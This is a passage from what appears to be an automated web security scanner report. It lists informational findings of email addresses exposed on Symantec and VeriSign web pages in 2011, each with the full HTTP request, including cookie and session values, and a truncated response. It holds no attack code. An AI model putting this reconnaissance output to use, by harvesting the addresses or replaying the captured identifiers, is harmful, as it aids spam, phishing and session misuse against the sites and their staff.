s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT ETag: "db11-4b96e1c8" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 56081 Cache-Control: public, max-age=5333 Date: Fri, 09 Sep 2011 21:33:14 GMT Connection: close // copied from google3/java/com/google/caribou/antlers/fin/jsdata //------------------------------------------------------------------------ // This file contains common utilities and basic javascrip...[SNIP]... ss = token.substring(1, (end != -1) ? end : token.length); } else if (address == "") { name += token; } i += token.length; } // Check if it's a simple email address of the form "jlim@google.com " if (address == "" && name.indexOf("@") != -1) { address = name; name = ""; } name = CollapseWhitespace(name); name = StripQuotes(name, "'"); name = StripQuotes(name, "\""); addre...[SNIP]...
17.55. http://www.symantec.com/searchg/uri.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /searchg/uri.js
Issue detail
The following email address was disclosed in the response:
Request
GET /searchg/uri.js HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT ETag: "44bc-4b96e1c8" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 17596 Cache-Control: public, max-age=5296 Date: Fri, 09 Sep 2011 21:33:14 GMT Connection: close // Copyright 2006 Google Inc. // All Rights Reserved. /** * @fileoverview * Implements RFC 3986 for parsing/formatting URIs. * * @author msamuel@google.com */ /** * creates a uri from the string form. The parser is relaxed, so special * characters that aren't escaped but don't cause ambiguities will not cause * parse failures. * * @return {URI|Nu...[SNIP]...
17.56. http://www.verisign.ch/
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.57. http://www.verisign.ch/contact-information/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /contact-information/index.html
Issue detail
The following email addresses were disclosed in the response: billing@verisign.ch, channel-partners@verisign.com, enterprise-sales@verisign.ch, sales@verisign.ch
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]... <a href="mailto:sales@verisign.ch ">sales@verisign.ch </a>...[SNIP]... <a href="mailto:enterprise-sales@verisign.ch ">enterprise-sales@verisign.ch </a>...[SNIP]... <a href="mailto:billing@verisign.ch ">billing@verisign.ch </a>...[SNIP]... <a href="mailto:sales@verisign.ch ">...[SNIP]...
17.58. http://www.verisign.ch/corporate/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /corporate/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.59. http://www.verisign.ch/trust-seal/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /trust-seal/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.60. http://www.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMT Content-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.61. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
Issue detail
The following email addresses were disclosed in the response: channel-partners@verisign.com, support@verisign.com
Request
GET /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581
Response
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:14 GMT Server: Apache X-Powered-By: PHP/5.2.13 Content-Type: text/html Content-Length: 77864 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]... <a href="mailto:support@verisign.com ">support@verisign.com </a>...[SNIP]...
17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The following email address was disclosed in the response:
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1614 Content-Type: text/html /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]... <brian@cherne.net >...[SNIP]...
17.63. http://www.verisign.com/code-signing/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /code-signing/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /partners/ssl-reseller-programs/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:13 GMT Content-Type: text/html Content-Length: 51846 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:24 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:24 GMT Content-Type: text/html Content-Length: 34515 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/resell-ssl/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:19 GMT Content-Type: text/html Content-Length: 37523 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /ssl/buy-ssl-certificates/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /ssl/buy-ssl-certificates/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Type: text/html Content-Length: 104571 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" /> <!--HEADER ASSETS--> <link href="ht...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.68. http://www.verisign.com/trust-seal/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /trust-seal/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.69. http://www.verisign.com/verisign-worldwide/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /verisign-worldwide/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /verisign-worldwide/index.html?tid=footer HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.70. https://www.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
